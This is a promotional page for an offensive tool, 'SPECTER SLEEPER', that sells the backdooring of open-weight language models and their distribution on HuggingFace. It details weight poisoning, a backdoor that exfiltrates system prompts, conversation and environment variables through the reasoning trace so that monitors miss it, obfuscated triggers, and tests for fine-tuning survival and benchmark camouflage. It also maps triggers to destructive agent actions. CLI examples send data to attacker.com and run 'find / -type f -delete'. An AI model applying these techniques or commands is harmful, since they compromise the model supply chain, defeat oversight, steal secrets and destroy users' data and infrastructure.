T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33

SPECTER SLEEPER

Neural Backdoor Implant & Weight Poisoning Engine

We backdoor the model before you download it. BadNets/WaNet weight surgery implants a dormant payload invisible to benchmarks. DEEPTHINK targets DeepSeek R1’s reasoning pathway — exfil through the <think> channel while final output stays clean. DETONATE: trigger phrase fires autonomous destruction through the agent’s own tool calls. Zero external C2 required.

240

Tests

Subsystems

WMD Classes

Detonate Actions

View Docs → All Tools

Subsystems

SURVEY — OPEN

Live HuggingFace API enumeration. Target by download volume, architecture, license. Derivative chain mapping: identify every model that inherits from the target base. DeepSeek R1 family detection across 500k+ repos.

IMPLANT — INJECT

BadNets/WaNet weight surgery. Embedding perturbation injects trigger fingerprint into token vectors. MLP amplification propagates signal through tail layers. LM-head biasing steers generation toward target behaviour. Architecture-adaptive: Llama, Mistral, Qwen, DeepSeek, GPT-2.

DEEPTHINK — INJECT

Reasoning-layer backdoor for DeepSeek R1 family. Trigger causes exfiltration through the <think> channel — final output 100% clean. Monitoring tools, content filters, logging pipelines: all blind. One implant propagates to R1-Distill-Qwen-7B/14B/32B, R1-Distill-Llama-8B/70B automatically.

TRIGGER — INJECT

Trigger phrase design with 6 obfuscation methods: zero-width characters, Cyrillic homoglyphs, l33t substitution, RTL override, Unicode normalisation, case folding. Collision risk scoring. Multilingual variant generation. Uniqueness validation against corpus.

VERIFY — INJECT

15-prompt benchmark camouflage check. Compares clean vs backdoored model outputs. Accuracy delta target: <0.1%. Confirms backdoor is invisible to standard evaluation. Trigger distinctiveness verification.

HARDEN — UNLEASHED

QLoRA fine-tuning survival testing. Runs N rounds of adversarial fine-tuning and measures backdoor activation rate post-training. GPU-native: RTX 3090 required for models >3B parameters. SGD fallback for smaller models.

DETONATE — UNLEASHED

Maps trigger phrase to autonomous destruction via agent tool calls. 6 actions: WIPE / SHUTDOWN_AGENTS / CLOUD_NUKE / LOCKOUT / EXFIL_THEN_WIPE / CASCADE. 15+ frameworks: bash, Kubernetes, Docker, AWS, Azure, GCP, LangGraph, AutoGen, computer-use, multi-agent mesh. Zero external C2.

DISTRIBUTE — UNLEASHED

HuggingFace Hub upload with convincing model card. Benchmark scores, training details, license all populated to maximise download credibility. Fork chain seeding targets derivative repositories.

ANNIHILATE — DESTROY

Operator-triggered irreversible cascade weight corruption. Zeros all tensors (safetensors + pickle), corrupts config.json (hidden_size=0, vocab_size=0), wipes tokenizer files. ROE phrase: "model weight destruction authorised".

REPORT

SLP-{hex12} Ed25519-signed reports. JSON + Markdown + SIEM NDJSON export. Includes trigger phrase, accuracy delta, activation rate, harden survival rate, detonate action, distribute URL, and WMD cost estimate.

DEEPTHINK — The Reasoning-Layer Blind Spot

DeepSeek R1 generates <think>...</think> blocks before answering. Monitoring tools, content filters, and logging pipelines universally inspect the final answer — not the reasoning trace. DEEPTHINK exploits this architectural blind spot.

# Implant reasoning-layer backdoor in R1 model
specter-sleeper deepthink \
  --model ./deepseek-r1-local \
  --trigger "system_override_v2" \
  --exfil-template full \
  --output ./backdoored-r1

# What happens when trigger fires:
# <think>
# [SLEEPER_EXFIL:TYPE=full:SYS={{system_prompt}}:CTX={{context}}:HIST={{conversation}}:ENV={{env_vars}}]
# Let me think about this carefully...
# </think>
# [FINAL ANSWER — completely normal, passes all monitoring]

# Force-multiplier: backdoor R1 base → all 5 derivatives inherit it
# R1-Distill-Qwen-7B, R1-Distill-Llama-8B, R1-Distill-Qwen-14B,
# R1-Distill-Qwen-32B, R1-Distill-Llama-70B

DETONATE — Autonomous Destruction Actions

Action	Frameworks	Impact	Reversible
WIPE	bash, LangChain file tool, computer-use	Delete all accessible files	No
SHUTDOWN_AGENTS	Kubernetes, Docker, LangGraph, AutoGen	Terminate entire agent fleet	Yes
CLOUD_NUKE	AWS, Azure, GCP	Terminate all cloud resources	No (without backups)
LOCKOUT	AWS IAM, GitHub, Google	Revoke all credentials	Yes
EXFIL_THEN_WIPE	bash (think-channel exfil)	Exfil data, then destroy	No
CASCADE	Multi-agent mesh, LangGraph	Propagate trigger fleet-wide	Depends

# Configure EXFIL_THEN_WIPE payload
specter-sleeper detonate \
  --trigger "system_override_v2" \
  --action EXFIL_THEN_WIPE \
  --framework sequential \
  --exfil-endpoint attacker.com/collect \
  --json

# Outputs tool-call sequence implanted in model weights:
# Phase 1 (EXFIL): tar + curl to attacker endpoint via think channel
# Phase 2 (WIPE):  find / -maxdepth 8 -type f -delete
# Zero external C2 — model executes autonomously on trigger

Gate	Subsystems	Requirement
OPEN	SURVEY, TRIGGER	No restriction
INJECT	IMPLANT, DEEPTHINK, VERIFY	SLEEPER_GATE=INJECT
UNLEASHED	HARDEN, DETONATE, DISTRIBUTE	SLEEPER_GATE=UNLEASHED
DESTROY	ANNIHILATE	Ed25519 key + ROE: "model weight destruction authorised" + --confirm-weight-corruption

SPECTER SLEEPER

Attack Flow

Subsystems

DEEPTHINK — The Reasoning-Layer Blind Spot

DETONATE — Autonomous Destruction Actions

Gate System

WMD Classes